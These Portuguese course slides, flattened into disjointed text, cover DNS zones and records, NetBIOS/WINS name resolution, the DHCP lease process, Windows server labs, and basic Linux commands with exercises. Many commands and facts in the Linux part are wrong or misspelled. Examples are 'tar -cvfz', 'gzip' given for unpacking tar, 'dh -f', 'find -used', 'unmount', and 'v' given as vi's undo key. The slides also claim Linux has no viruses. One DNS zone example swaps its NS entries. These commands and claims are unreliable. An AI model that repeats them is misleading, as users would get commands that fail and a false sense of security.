um ou mais servidores
armazenam um banco de dados
distribuídos
IP
IPB
Servidor DNS
Nome de Domínio Os nomes Hierárquicos utilizados pelo DNS
são chamados FQDN:
– Fully Qualified Domain Name
Exemplo:
– www.pucpr.br
– www: nome do host
– pucpr: nome de domínio
– br: nome de domínio
Nome de domínio:
– Coleção de HOSTS ou de outros
domínios.
Árvore de nomes
br
pucpr
www
ufpr
ppgia
br
Pucpr
Ufpr
www
ppgia www
FOLHA
RAIZ
www
Banco de Dados Distribuídos No serviço DNS, os nomes estão armazenados em ZONAS. Zonas são
arquivos textos que contém os nomes de um ou mais domínios.
br
pucpr
www
ufpr
www
RAIZ
www
ppgia
ZONA .br
ZONA ufpr.br ZONA pucpr.br
Banco de Dados Distribuídos Cada Zona pode ser armazenada num servidor DNS distinto.
br
pucpr
www
ufpr
www
RAIZ
www
ppgia
ZONA .br
ZONA ufpr.br ZONA pucpr.br
servidor
dns.br
servidor
dns.pucpr.br
servidor
dns.ufpr.br
Exemplo de arquivo de Zona
@ SOA dns.pucpr.br
@ NS dns.pucpr.br
dns.pucpr.br. A 200.17.99.2
www A 200.17.99.2
www.ppgia A 200.17.98.174
ZONA pucpr.br
SOA: START OF AUTHORITY
NS: NAME SERVER
A: HOST
• SOA indica qual o servidor armazena o arquivo de zona
• NS indica qual o servidor que responde pelo domínio.
• Nomes terminados por “.” são absolutos
Exemplos de arquivo de Zona
@ SOA dns.ufpr.br
@ NS dns.ufpr.br
dns.ufpr.br. A 200.101.0.12
www A 200.101.0.15
ZONA ufpr.br
• @ SOA dns.pucpr.br
• @ NS dns.pucpr.br
• dns.pucpr.br. A 200.17.99.2
• www A 200.17.99.2
• www.ppgia A 200.17.98.174
ZONA pucpr.br
• @ SOA dns.br
• @ NS dns.br
• pucpr NS www dns.ufpr.br
• ufpr NS dns.pucpr.br
• dns.pucpr A 200.17.99.2
• dns.ufpr A 200.101.0.12
ZONA.br
Tipos de Registros no DNS A: Host Adress
– associa um nome a um endereço IP: nome
IP.
PTR: Point Resource Record
– associa um endereço IP a um nome: IP
nome.
NS: Name Server
– identifica o servidor DNS no domínio.
SOA: Start of Authority
– indica que o servidor de DNS é a autoridade
para fornecer informações no domínio
(authoritative).
Consulta Reversa
O cliente fornece um número IP e requisita o nome
correspondente.
Os registros que relacionam IPs aos nomes são do
tipo PTR.
– Por exemplo, um registro para o endereço IP 10.17.98.31
corresponde a uma entrada DNS no seguinte formato:
• 31.98.17.10.in-addr.arpa
Se o endereço IP não estiver contido no domínio
local (aquele controlado pelo servidor DNS
consultado), o servidor DNS contata o servidor DNS
situado num nó superior da árvore.
– Este mecanismo de procura seqüencial consultando os nós
superiores é chamado “walking the tree”.
Forwarder Cada servidor DNS possui um arquivo de
configuração que diz:
– Lista de zonas que ele armazena
– Lista de servidores forwarders
Lista de zonas
– Indica a localização física do arquivo
correpondente a cada ZONA.
Lista de forwarders
– Um forwarder é um servidor DNS
hierarquicamente superior ao servidor corrente.
– Esse servidor recebe as consultas de domínios
não armazenados pelo servidor DNS.
Exemplo
forwarders
{
200.17.99.2
}
pucpr.br
{
/etc/pucprbr.dns
}
Arquivo de configuração do servidor dns.pucpr.br
forwarders
{
primeiro forwarder
segundo forwarder
etc.
}
zona
{
localização
}
zona
{
localização
}
Ponteiros NS e Forwarders
br
pucpr
www
ufpr
www
RAIZ
www
ppgia
ZONA .br
ZONA ufpr.br ZONA pucpr.br
FORWARDER FORWARDER
NS NS
Consulta Recursiva Graças ao ponteiros NS e FORWARDER qualquer servidor DNS pode
responder por toda a árvore de domínios.
A resposta pode ser:
– O mapeamento nome-IP requisitado
– Uma mensagem de erro dizendo que o domínio ou host não foi
encontrado.
a b c d
ufpr pucpr
.br
d.ufpr.br
IP = 200.17.98.174
a.pucpr.br?
IP = 10.17.98.31
RESPOSTA NÃO AUTORITÁRIA SE VIER DA CACHE
RESPOSTA AUTORITÁRIA
1
2 3
4 5
6
1
2
DNS e a Internet O “root” da árvore de nomes da Internet é
gerenciado pelo Internet Network Information Center (InterNIC)
InterNIC é o nome dado a um projeto criado num acordo entre a National Science Foundation (NSF) e a Network Solutions, Inc.
– Provê um serviço de registro de nomes para os domínios .com, .net, .org, and .edu;
– O site do InterNIC é http://www.internic.net
O InterNIC delega a responsabilidade de administrar partes do domínio de nomes para as empresas e organizações conectadas na Internet.
Domínios Gerenciados pelo
InterNIC Segundo a nomenclatura adotada na Internet, o
“Domain Name Space“ é dividido em três áreas principais: – Organization Domains:
• 3 caracteres para indicar a atividade da empresa.
– .com, .edu, .gov, .int, .mil, .net, .org
– .int: organizações internacionais
– .mil: organizações militares
– .org: organizações não comerciais
– Geographical Domains:
• 2 caracteres para identificar o país.
– .br, .fr, .jp, etc.
– Reverse domain:
• domínio especial utilizado para associar endereços IP aos nomes.
Exemplo
Gerido pelo
InterNIC
.com .org .edu
.pucpr
www ppgia
rla01
Fully qualified domain
name
(FQDN)
www.pucpr.br
.br
.com Gerido pela
FAPESP
Gerido pela
PUC
Zonas Servidor DNS
do Internic
.com .org .edu
.pucpr
www ppgia
rla01
.br
.com Servidor DNS da
FAPESP
Servidor DNS da
PUC
REGISTRO
NS
Tipos de Servidores Primário
– É o servidor autoritário para zona. A inclusão, alterações ou exclusão dos registros da zona são feitas através deste servidor.
– O servidor primário envia uma cópia dos seus arquivos de dados para o servidor secundário através de um processo denominado “zone transfer”
Secundário – Funciona como backup. Apenas lê os arquivos de dados
do servidor primário, e responde as requisições dos clientes quando requisitado.
Caching-Only – São servidores DNS que apenas efetuam consultas e
guardam o resultado numa cache e retornam os resultados.
– Um servidor DNS realiza consulta a outros servidores sempre que tiver que localizar um nome externo as zonas que controla.
DNS - Resumo Vantagens:
– Implementa um mecanismo de nomes hierárquico.
• Isto facilita a organização dos nomes em redes de grande
porte.
– O banco de dados que armazena os nomes é distribuído.
• Cada servidor DNS contém informações de zonas específicas,
e pode ser administrado separadamente.
– É o mecanismo de nomes adotado na Internet.
• Pode ser utilizado para resolver nomes na rede local (intranet)
e na rede Internet.
Desvantagem:
– Não é dinâmico.
• É responsabilidade do administrador manter as entradas do
arquivo de nomes atualizada.
Netbios
290
Nomes NetBIOS O espaço de nomes NetBIOS é “flat”
– flat = não segmentado
– implica que cada nome NetBIOS na rede deve ser único
Os recursos na rede são identificados por nomes
NetBIOS registrados dinâmicamente quando:
– o computador é inicializado
– serviços são inicializados
– usuário se loga.
Nomes NetBIOS tem 16 caracteres de comprimento.
– O usuário atribui os 15 primeiros caracteres.
– O último caracter é reservado para indentificar o tipo de
recursos.
Nomes Registrados na Estação
C:\>nbtstat -n
Endeço-Ip nó: [200.17.98.217] Identificador de escopo: []
Tabela de nomes locais de NetBIOS
Nome Tipo Status
------------------------------------------------------------------------
PPGIA16 <00> UNIQUE Registrado
PPGIA16 <20> UNIQUE Registrado
MESTRADO <00> GROUP Registrado
PPGIA16 <03> UNIQUE Registrado
MESTRADO <1E> GROUP Registrado
JAMHOUR <03> UNIQUE Registrado
Nomes NetBIOS Podem ser de dois tipos:
– UNIQUE (one owner)
• Referenciam um único recurso na rede
• Exemplo: uma estação
– GROUP (multiple owner)
• Referenciam um conjunto de recursos na rede
• Exemplo: nome de domínio, nome de grupo
Alguns exemplos de tipos para identificadores
únicos são:
– <00> Nome do Computador e do Domíno (ou grupo)
– <03> Usuário logado
– <20> Serviço de nomes de servidor para sincronização de
arquivos compartilhados
Registro e Resolução de Nomes
NetBIOS Os seguintes mecanismos são utilizados para
localizar recursos NetBIOS
– NetBIOS name cache
– NetBIOS name server - WINS server
– IP subnet broadcast
– Static LMHOSTS files
– Static HOSTS files
– DNS servers
Os mecanismos de resolução de nomes do
NetBIOS sobre TCP/IP são definidos pelas RFCs
1001 e 1002
– de acordo com a estratégia utilizada para resolver
nomes, os computadores são denominados b-node, p-
nome, m-node ou h-node.
Resolução de Nomes por
BroadCast Resolução de nomes usado broadcast IP fornece um
método dinânico para resolução de endereços.
– Datagrama “NetBIOS Name Query” em broadcast perguntando o nome correspondente ao endereço.
– Endereço MAC: FF-FF-FF-FF-FF-FF
– Endereço IP: 255.255.255.255
Problemas:
– Aumento do tráfego na rede
– Não funciona em redes segmentadas por rotedores
• Os recursos localizados em outras redes não recebem os pedidos de broadcast pois, por default, o roteador bloqueia os pacotes recebidos em broadcast.
Extranets = VPN (Virtual Private Networks)
REDE A REDE B
IAPO1 IAPO2 ACME LAB0101 PPGIA
BROADCAST BROADCAST
NOMES NETBIOS NOMES NETBIOS
Cache com Nomes NetBIOS Cada estação mantém uma tabela com os nomes NetBIOS
mais usados recentemente.
C:\>nbtstat -c
Endereço-Ip nó: [200.17.98.217] Identificador de escopo: []
Tabela de nomes de caches remotas de NetBIOS
Nome Tipo Endereço Host Duração
[seg]
---------------------------------------------------------------
PPGIA07 <00> UNIQUE 200.17.98.224 20
PPGIA07 <20> UNIQUE 200.17.98.224 600
HAL2001 <00> UNIQUE 10.17.98.31 660
Usando o Arquivo HOSTS O arquivo “hosts” permite relacionar nomes a IP’s,
evitando a resolução por broadcast.
– A diretiva #PRE pode ser utilizada para registrar entradas
diretamente na cache.
– Neste caso, as entradas são consultadas antes de qualquer
outro mecanismo de resolução:
Exemplos: • 10.17.98.31 hal2001 #pre #coloca a entrada na cache
• 10.17.08.30 PPGIA16 #não coloca na cache
Existe também uma diretiva especial para definir
domínios: • 10.17.98.42 server1 #pre #DOM:ELETRICA.RIEP
SERVIDORES DE NOMES NETBIOS MECANISMO DE RESOLUÇÃO DE NOMES
NETBIOS SEM BROADCAST
– Mantém uma tabela que mapeia os endereços IP com o
nome dos computadores.
– A tabela é atualizada dinamicamente toda a vez que uma
máquina recebe um novo endereço IP.
Exemplo: WINS: Windows Internet Name Service
O serviço WINS trabalha numa arquitetura cliente-
servidor.
– WINS Server:
• manipula todos as consultas de nomes.
– WINS Client:
• registra seu nome e endereço no servidor WINS.
• envia as requisições de nomes para o WINS server.
WINS NÃO USA BROADCAST
REDE A REDE B
IAPO1 IAPO2 ACME LAB0101 PPGIA
WINS
SERVER
IP e NOME são fornecidos na inicialização
TABELA
DINÂMICA REQUEST
REPLY
Características do WINS Ao contrário da resolução de nomes por broadcast, WINS permite que os
nomes sejam resolvidos de maneira transparente através de roteadores.
WINS proxy
replicação WINS enabled
WINS server
WINS server roteador LINK DE BAIXA
CAPACIDADE
Non- WINS enabled
Definições WINS Server
– Computador que executa o serviço Windows Internet
Name
• Este computador mantem uma base de dados relacionando
os nomes e os endereços IP das estações na rede.
– Pode haver mais de um servidor WINS na rede.
Cliente WINS enabled
– Estação configurada para resolver nomes pelo WINS.
Cliente Non-WINS enabled
– Estação não configurada ou incompatível com o serviço
WINS.
WINS proxy
– Estações que acessam o serviço WINS para os clientes
Non-WINS enable.
Múltiplos Servidores WINS
A utilização de múltiplos servidores WINS é aconselhável
pois:
– permite distribuir a carga de resolução de nomes
• as consultas de nomes feita pelos clientes são ponto-a-
ponto.
• O mecanismo de broadcast só é utilizado quando o
nome solicitado não é encontrado na base do servidor
WINS.
– diminui a possibilidade de interrupção do serviço de
nomes
• cada servidor WINS possui uma cópia completa da
base de nomes, funcionando como backup dos
demais.
• quando um servidor entra em pane, os clientes passam
a consultar automaticamente o outro servidor.
WINS NÃO É APROPRIADO PARA INTERNET
Para redes grandes, o WINS é inviável pois:
– O número de replicações é muito grande
– Cada servidor WINS guarda uma cópia completa de todos os nomes.
WINS SERVER WINS SERVER
WINS SERVER WINS SERVER
REPLICAÇÃO
Ciclo de Vida dos Nomes NetBIOS
Active
(Ativo)
Released
(Liberado)
Elimando
O cliente foi
desligado
Ou o nome foi
liberado
explicitamente
O prazo de
renovação foi
esgotado (6 dias)
Não renovado
(x dias)
OUTRO COMPUTADOR PODE
SOLICITAR O DIREITO DE
USAR O NOME
Os nomes NetBIOS são concedidos por empréstimo. Precisam ser renovados periodicamente para que o computador mantenha o nome.
Resolução de Nomes
Os mecanismos de resolução de nomes do NetBIOS
sobre TCP/IP são definidos pelas RFCs 1001 e
1002.
– b-node: (broadcast-node)
resolvem nomes por broadcast de IP
– p-node: (point-to-point-node)
usam um servidor de nomes NetBIOS
– m-node: (mix -node)
se b-node falhar tentam p-node.
– h-node: (hybrid-node)
se p-node falhar tentam b-node
WINS - Resumo Vantagens:
– Reduz significativamente o número de broadcasts de endereços IP necessários para localizar recursos locais e remotos.
– Permite que clientes resolvam nomes de estações situados em segmentos remotos isolados por roteadores.
– Reduz a necessidade de manter e atualizar os arquivos LMHOSTS.
Desvantagens: – Não implementa um mecanismo de nomes hierárquico.
Isto dificulta a administração de redes de grande porte.
– O banco de dados que armazena os nomes NetBIOS não é distribuído. Cada servidor WINS constitui uma réplica completa do banco de dados de nomes.
– Não é compatível com o serviço de nomes usado na Internet.
DHCP
308
DHCP
Dynamic Host Configuration Protocol
– Padrão Industrial Aberto
• IETF RFC 1533, 1534, 1541 e 1542.
– IETF: Internet Engineering Task Force
– RFC: Request for Comments
– Utilizado para centralizar a administração e
configuração de parâmetros TCP/IP numa
rede.
– Elimina a necessidade de configurar
manualmente os clientes numa rede
TCP/IP.
DHCP - Arquitetura Cliente-
Servidor
Um computador da rede deve funcionar como servidor DHCP.
REQUEST
REPLY
CLIENTES
DHCP
SERVIDOR
DHCP
Administração de Endereços IP Cada computador numa rede TCP/IP deve ter um
endereço IP único.
– O endereço IP identifica a estação e a rede ao qual a
estação pertence.
– Quando o computador é movido para outra rede, seu
endereço IP deve refletir esta mudança.
DHCP especifica os seguintes serviços (RFC 1541):
– um protocolo para que o servidor DHCP e seus clientes se
comuniquem.
• PROTOCOLO BOOTP
– Um método para configura os parâmetros de rede de um
host IP:
• IP, máscara, gateway default, servidores de nomes, etc.
ESCOPO DHCP Quando se utiliza DHCP, cada rede local é caracterizada
por um ESCOPO:
PARTE FIXA
MASCARA
GATEWAY
SERVIDOR DE NOMES
OUTRAS ROTAS
PERÍODO DE EMPRÉSTIMO
PARTE DINÂMICA
RANGE DE IP’S
MESMO VALOR
PARA TODOS OS
HOSTS DO ESCOPO
UM VALOR
DIFERENTE PARA
CADA HOST DO
ESCOPO
Processo de Atribuição
Cliente
DHCP
Servidor
DHCP
Dhcpdiscover
Dhcpoffer 200.17.98.1
Dhcprequest 200.17.98.1
Dhcpack 200.17.98.1
...
Dhcprelease 200.17.98.1 Todas as
mensagens são
enviadas em
broadcast
255.255.255.0
200.17.98.23
72 horas
200.17.98.1
…
200.17.98.254
ESCOPO
Processo de Atribuição 1) O cliente envia a mensagem Dhcpdiscover em broadcast.
– O endereço IP de origem do pacote é 0.0.0.0 pois o cliente ainda não tem um endereço IP.
2) Quando o servidor recebe o pacote, ele seleciona um
endereço IP disponível na sua lista e oferece ao cliente. – O servidor responde ao cliente com a mensagem
Dhcpoffer
3) Quando o cliente recebe a oferta ele pode:
– aceitar enviando a mensagem Dhcprequest (incluindo o IP) em broadcast
– recusar enviando a mensagem Dhcpdecline em broadcast
4) Quando o servidor recebe o Dhcprequest ele pode:
– confirmar para o cliente com a mensagem Dhcpack
– recusar, se o endereço foi usado por outro, com a mensagem Dhcpnack
5) O cliente pode liberar um endereço com a mensagem Dhcprelease.
Observações 1) O cliente aceita a primeira oferta que receber.
– Se houver mais de um servidor DHCP distribuindo
endereços IP, não haverá como selecionar
apenas um deles.
2) O direito do cliente de usar o endereço IP
recebido pelo servidor DHCP é temporário.
– Quando o prazo de validade do IP expira, o
servidor pode atribuí-lo a outra estação na rede.
– O cliente pode liberá-lo antecipadamente com a
mensagem Dhcprelease
Observações
3) Se o cliente não receber a oferta do servidor:
– Ele repete o pedido em intervalos de 2, 4, 8, 16 segundos.
– Se as 4 tentativas fracassarem, ele tenta novamente em intervalos de 5 minutos.
4) Quando o cliente é reinicializado, ele tenta utilizar o mesmo IP que tinha anteriormente.
– Ele envia o pacote Dhcprequest com o endereço IP antigo ao invés do Dhcpdiscover.
– Se o pedido é negado, então o cliente envia um Dhcpdiscover.
Processo de Atribuição: Outras
Vezes
Cliente
DHCP
Servidor
DHCP
Dhcprequest 200.17.98.1
Dhcpack 200.17.98.1
Todas as
mensagens são
enviadas em
broadcast
255.255.255.0
200.17.98.23
72 horas
200.17.98.1
…
200.17.98.254
ESCOPO
Dhcpnack
Dhcpdiscover
OU
…
Considerações sobre o
Planejamento da Implementação
do DHCP Para redes não segmentadas:
– Um único servidor DHCP pode atender até 10000 clientes
(estimativa).
Para redes segmentadas:
– Se os roteadores são compatíveis com a RFC1542
• Um único servidor DHCP é suficiente.
– Se os roteadores não são compatíveis com a RFC1542
• Deve-se utilizar um servidor DHCP para cada rede.
Computadores que se ligam temporariamente na rede
(notebooks, por exemplo) devem receber IPs com
tempo de “leasing” curto.
Posicionando Servidores DHCP
Roteador
RFC 1542
compatível
Agente relay
DHCP/BOO
TP
Roteador não RFC
1542
compatível
Servidor
DHCP 1
Servidor
DHCP 2
Prática: DHCP
Instalar e configurar o DHCP;
Criar Escopo
Áreas de exclusões
Definir arquivos por MAC ADDRESS
320
Prática : Instalação DHCP
321
Prática: Instalação de Serviços
DNS
Terminal Service
Wins
322
Instalar Terminal Service
323
Prática : Instalando o IIS
Instalando e configurando
Disponibilizando um site
Configurando o DNS
324
Prática: IIS
325
Prática: IIS
326
Prática: Criação de Domínio
Instalar e configurar o dominio;
Criar usuários
Compartilhamento de arquivos
Definição de segurança com o GPO
327
Prática: Instalação DHCP
328
Prática: Criar Domínio
Iniciar / Executar / dcpromo
329
Prática: Criar Domínio
330
Prática: Criar Domínio
331
LiNUX: Ubuntu
332
Instalação
333
Estrutura dos diretórios Vamos conhece-los de acordo com a FHS (Filesystem Hierarchy
Standard):
Todos os diretórios abaixo então dentro do diretório raiz, ou seja,
“/”.
/bin : Arquivos e programas do sistema que são usados com
freqüência pelos usuários.
/boot : Arquivos necessários para a inicialização do sistema.
/cdrom : Ponto de montagem da unidade de CD-ROM.
/dev : Arquivos usados para acessar dispositivos do
computador.
/etc : Arquivos de configuração do computador.
/floppy : Ponto de montagem de unidade de disquetes
/home : Diretório que contém os arquivos de cada usuário.
/lib : Bibliotecas do sistema.
/lost+found : Local de arquivos e/ou diretórios recuperados pelo
sistema. 335
Estrutura dos diretórios (cont) /mnt : Ponto de montagem temporário.
/proc : Sistema de arquivos do Kernel.
/root : Diretório do usuário root, o administrador do sistema.
/opt : Local para aplicativos opcionais serem instalados.
/media : Ponto de montagem de mídia removível, câmeras
digitais, pendrives
/sbin : Diretório de programas usados pelo superusuário (root)
para administração e controle do funcionamento do sistema.
/tmp : Arquivos temporários criados por programas.
/usr : Diretório dos aplicativos. A maioria estará instalada neste
diretório. Curiosidade: usr não quer dizer “User” e sim “Unix
System Resources”.
/var : Diretório contém arquivos que são gravados com freqüência
pelos aplicativos do sistema, como: e-mails, cache, spool de
impressora.
Essa estrutura que mostrei acima, é considerada padrão. Encontrará
a mesma se estiver utilizando a distribuição da Red Hat, SuSe ou
o Ubuntu.
336
Estrutura de dispositivos Linux DOS IRQ DMA I/O
ttyS0 COM1 4 0x3F8
ttyS1 COM2 3 0x2F8
ttyS2 COM3 4 0x3E8
ttyS3 COM4 3 0x2E8
lp0 LPT1 7 3(ECP) 0x378
lp1 LPT2 5 3(ECP) 0x278
/dev/hda1 C: 14 0x1F0,0x3F6
/dev/hda2 D: * 14 0x1F0,0x3F6
/dev/hdb1 D: 15 0x170,0x376
337
Comandos Básicos Comparação DOS x Linux
338
DOS Linux Diferenças
cls clear Sem diferenças.
dir ls -la A listagem no Linux possui mais campos (as
permissões de acesso) e o total de espaço ocupado no diretório e livre
no disco deve ser vistos separadamente usando o comando du e df.
Permite também listar o conteúdo de diversos diretórios com um só
comando (ls /bin /sbin /...).
cd cd Poucas diferenças. cd sem parâmetros retorna ao diretório de usuário
e também permite o uso de "cd -" para retornar ao diretório
anteriormente acessado.
del rm Poucas diferenças. O rm do Linux permite especificar diversos
arquivos que serão apagados (rm arquivo1 arquivo2 arquivo3). Para
ser mostrados os arquivos apagados, deve-se especificar o
parâmetro "-v" ao comando, e "-i" para pedir a confirmação ao apagar
arquivos.
md mkdir Uma só diferença: No Linux permite que vários diretórios sejam criados
de uma só vez (mkdir /tmp/a /tmp/b...).
fdisk fdisk,
cfdisk
Os particionadores do Linux trabalham com praticamente todos os
tipos de partições de diversos sistemas de arquivos diferentes.
help man, info Sem diferenças.
Comandos Básicos Comparação DOS x Linux
339
DOS Linux Diferenças
echo echo Sem diferenças.
copy cp
Poucas diferenças. Para ser mostrados os arquivos enquanto estão
sendo copiados, deve-se usar a opção "-v", e para que ele pergunte
se deseja substituir um arquivo já existente, deve-se usar a opção "-i".
path path No Linux deve ser usado ":" para separar os diretórios e usar o
comando "export PATH=caminho1:/caminho2:/caminho3:"
para definir a variável de ambiente PATH. O path atual pode ser
visualizado através do comando "echo $PATH".
ren mv Poucas diferenças. No Linux não é possível renomear vários arquivos
de uma só vez (como "ren *.txt *.bak"). É necessário usar um shell
script para fazer isto.
type cat Sem diferenças.
ver
uname -a Poucas diferenças (o uname tem algumas opções a mais).
format mkfs.ext3 Poucas diferenças, precisa apenas que seja especificado o dispositivo
a ser formatado como "/dev/fd0" ou "/dev/hda10" (o
tipo de identificação usada no Linux), ao invés de "A:" ou "C:".
mem cat
/proc/meminfo
top
Mostra detalhes sobre a quantidade de dados em buffers, cache e
memória virtual (disco).
Comandos Básicos Comparação DOS x Linux
340
DOS Linux Diferenças
date date No Linux mostra/modifica a Data e Hora do sistema.
time date No Linux mostra/modifica a Data e Hora do sistema.
attrib chmod O chmod possui mais opções por tratar as permissões de
acesso de leitura, gravação e execução para donos, grupos e
outros usuários.
chkdsk fsck.ext3 O fsck é mais rápido e a checagem mais abrangente.
scandisk fsck.ext3 O fsck é mais rápido e a checagem mais abrangente.
doskey ----- A memorização de comandos é feita automaticamente pelo
bash.
edit vi, ae,
emacs,
mcedit
O edit é mais fácil de usar, mas usuário experientes
apreciarão os recursos do vi ou o emacs (programado em lisp)
interlnk plip O plip do Linux permite que sejam montadas redes reais a
partir de uma conexão via Cabo Paralelo ou Serial. A máquina
pode fazer tudo o que poderia fazer conectada em uma rede
(na realidade é uma rede e usa o TCP/IP como protocolo)
inclusive navegar na Internet, enviar e-mails, irc, etc.
intersvr plip Mesmo que o acima.
Comandos Básicos Comparação DOS x Linux
341
DOS Linux Diferenças
label e2label É necessário especificar a partição que terá
more more, less O more é equivalente a ambos os sistemas, mas o less permite que
sejam usadas as setas para cima e para baixo, o que torna a leitura
do texto muito mais agradável.
move mv Poucas diferenças. Para ser mostrados os arquivos enquanto estão
sendo movidos, deve-se usar a opção "-v", e para que ele pergunte se
deseja substituir um arquivo já existente deve-se usar a opção "-i".
scan ----- Não existem vírus no Linux devido as restrições do usuário durante
execução de programas.
backup tar O tar permite o uso de compactação (através do parâmetro -z) e tem
um melhor esquema de recuperação de arquivos corrompidos que já
segue evoluindo há 30 anos em sistemas UNIX.
print lpr O lpr é mais rápido e permite até mesmo impressões de gráficos ou
arquivos compactados diretamente caso seja usado o programa
magicfilter. É o programa de Spool de impressoras usados no sistema
Linux/Unix.
vol e2label Sem diferenças.
xcopy cp -R Pouca diferença, requer que seja usado a opção "-v" para mostrar os
arquivos que estão sendo copiados e "-i" para pedir
confirmação de substituição de arquivos.
Comandos Básicos Verificar o Local onde está trabalhando => pwd
Criar diretório => mkdir <diretorio>
mkdir <aula>
Chamar diretório => cd
cd aula
Verificar o que existe no diretório => ls –la
Criar arquivos vazios => touch
touch arquivo1
Editar o arquivo => vi, mc,
vi <arquivo> ou vi /<caminho>/arquivo
342
Comandos Básicos Alguns comandos do vi
inserir -> a,insert
yy -> copiar (copiar n linhas usar n cc)
dd -> apagar (apaga n linhas usar n dd)
p -> colar
/ -> procurar
v -> desfaz a última alteração
:x ou :wq -> salva e sai
:q! -> sair sem salvar
Criar o texto abaixo (crie 2 arquivos fazios chamado http e telnet edite
o texto abaixo):
### Permite acesso web (HTTP).
$IPTABLES -A FORWARD -p tcp --dport 80 -j ACCEPT
### Permite acesso web (TELNET).
$IPTABLES -A FORWARD -p tcp –dport 23 -j ACCEPT
343
Comandos Básicos Move arquivo => mv
mv /<caminho_antigo>/<arquivo> /<novo_caminho>/<arquivo>
Renomear arquivo=> mv
mv /<caminho>/<arquivo atual> /<caminho>/<arquivo novo >
Diferença entre 2 arquivos => diff
diff <arquivo1> <arquivo2>
Para melhor fixação faça o seguinte exercício:
- Na sua pasta home, crie um diretório chamado aula e dentre dele
mais dois diretórios chamados http e ftp.
- Move os arquivos criados anteriormente (http e ftp) para as
suas respectivas pastas
- Renomeie os arquivos para new_http e new_ftp
- Verifique a diferença entre os arquivos 344
Comandos Básicos verificar uma placa de rede => ifconfig
Verificar os usuários que estão logados ou em telnet => w
Compactar arquivos
Tar.gz => tar -cvfz <nm do arquivo>.tar.gz <diretório a ser compactado>
Ex: tar -cvfz etc.tar.gz etc
bz2 (melhor compactação)
tar –cvjf <nmdoarquivo>.tar.bz2 /<caminhod do arquivo>
EX: tar –cvjf ergon.tar.bz2 /mnt/temp
Para descompactar estes formatos de arquivos, os comandos são
simples:
zip: => gunzip nomedoarquivo
rar: => rar x nomedoarquivo
tar: => gzip nomedoarquivo
tar.gz: => tar -vzxf nomedoarquivo
tar.bz2: => tar -vxjpf nomedoarquivo
345
Comandos Básicos juntar dois arquivos => cat <arquivo final> <arquivo1> <arquivo2>
Dar permissão arquivos => chmod
chmod <numero> <caminho/arquivo>
Verificação de Permissão (direito nos arquivos)
d rwx r-x –wx
d => diretório
1 trinca => usuário proprietário
2 trinca => grupo do usuário proprietário
3 trinca => outros usuário
r -> read (4) w-> write (2) x ->execute (1)
rwx -> 4+2+1=7
r-x -> 4+0+1=5
rw- -> 4+2+0=6
r-- -> 4+0+0=4
346
Comandos básicos
Exercício de fixação
Dentro do diretório aula crie um arquivo
apartir da junção dos arquivos http_new e
ftp_new, cujo nome será firewall, sendo
que este arquivo deverá ter as seguintes
permisões:
Usuário proprietário = completo
Grupo usuário proprietário = leitura e escrita
Outros = leitura e execução
Depois faça a compactação da pasta aula 347
Comandos Básicos Verificar processos rodando na maquina => top ou ps –aux ou os -aux
|grep <processo>
Matar processos => kill -9 <pid processo>
Montar unidades (cdrom, pen driver, hd sata, ...) => mount
$ sudo fdisk –l
$ mount /dev/sda
Desmontar => unmount
Unmount /dev/das
Exercício:
Mountar e desmontar a unidade do cdrom.
Abrir uma nova sessão (console) e matar o seu processo.
348
Comandos Básicos Respostas
sudo mount /dev/cdrom /cdrom
umount /cdrom
ps –aux |grep console
Kill -9 <numero processo>
Localizar arquivos no computador => find ou locate
$ find caminho expressões
updatedb &
locate <arquivo>
Ex: Para localizar arquivos que foram acessados nos últimos 10 dias e os
arquivos cujo nome seja sysconfig
$ find / -used 10 e $locate sysconfig
Exercício: Localizar todos os arquivos que possuam a palavra host e que
estejam dentro da pasta /var
349
Updatedb ou find /var | grep host
Locate host | grep var
Comandos básicos verificar o espaço em disco => df –h
verificar o que o diretório possue e o tamanho => du –h
Verificar memória => free
Verifica os espaços por partições => dh -f
Verifica o tamanho dos arquivos e faz a soma do total no final =>df -h –c
Verificar o processador do servidor => cat /proc/cpuinfo
reparar disco (*) => fsck -cy /dev/???
Exercício: Gostaria de saber quanto tenho de espaço de disco livre e quanto
de espaço o meu diretório, a quantidade de memória total e livre, qual o
meu processador, a quantidade de processos rodando nele e reparar o
meu disco
350
$ df –h
$ du -h /home/virtual
$free
$ top
$ cat /proc/cpuinfo
$ fsck –cv /dev/sda1
Localização de Arquivos Importantes
serviços e resoluções de problemas
dhcpd ==> /etc/rc.d/init.d/dhcpd restart
samba ==> /etc/rc.d/init.d/smb restart
apache ==> /etc/rc.d/init.d/httpd restart
sendmail ==> /etc/rc.d/init.d/sendmail restart
verificações de logs
dhcpd ==> /var/log/mensages
samba ==> /var/log/samba/log.smb
log.nmb
log.<nm do computador>
apache ==> /var/log/httpd/access_log
sendmail ==> /var/log/maillog
printer ==> /var/log/spooler
arquivos para serem backpeados
usuário ==> /etc/passwd
grupos ==> /etc/group
conf impressora ==> /etc/printcap
tabela de IP ==> /etc/hosts
dhcpd ==> /etc/dhcpd.conf
sendmail ==> /etc/sendmail.cf
samba ==> /etc/smb.conf
senhas do samba ==> /etc/smbpasswd
apache ==> /etc/httpd/conf/acess.conf
/etc/httpd.conf
/etc/srm.conf
351
Comparação dos Programas do Windows x Linux
352
Windows Linux Diferenças
Microsoft
Office
Open Office O Open Office possui todos os recursos do Word, excel e power point além
de ter a interface gráfica igual, menus
e teclas de atalho idênticas ao office, o que facilita a migração.
Também trabalha com arquivos no formato office 97/2000 e não é
vulnerável a vírus de macro.
MS Access MySQL,
PostgreSQL
Oracle
Existem diversas ferramentas de conceito para bancos de dados
corporativos no Linux. Todos produtos compatíveis com outras plataformas.
MS Outlook Pine, icedove
evolutionmutt
sylpheed,
Centenas de programas de E-Mail tanto em modo texto como em modo
gráfico. Instale, avalie e escolha.
MS Internet
Explorer
Firefox, Opera,
Mozilla, lynx.
Os três primeiros para modo gráfico e o lynx opera em modo texto.
ICQ LICQ,
PIDGIM, SIM
Muito prático e fácil de operar. Possibilita a mudança completa da aparência
do programa através de Skins. A organização dos menus deste programa é
outro ponto de destaque.
MSN AMSN,
PIDGIM
Permite conversar diretamente com usuários do Microsoft MSN.
Photo Shop The Gimp Fácil de usar, possui muitos scripts que permitem a criação rápida e fácil de
qualquer tipo de efeito profissional pelo usuário mais leigo. Acompanha
centenas de efeitos especiais e um belo manual em html com muitas fotos
aproximadamente 20MB) que mostra o que é possível se fazer com ele.
Comparação dos Programas do Windows x Linux
353
Windows Linux Diferenças
Corel Photo
Paint
GIMP Programa com funções genéricas
Corel Draw Inkscape,
Sodipodi
Programas equivalentes
